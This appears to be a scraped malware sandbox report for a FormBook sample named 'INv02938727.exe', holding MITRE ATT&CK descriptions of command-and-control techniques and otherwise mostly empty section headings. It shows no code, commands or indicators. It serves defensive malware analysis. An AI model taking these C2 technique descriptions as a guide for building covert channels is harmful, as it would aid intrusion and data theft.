Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report INv02938727.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON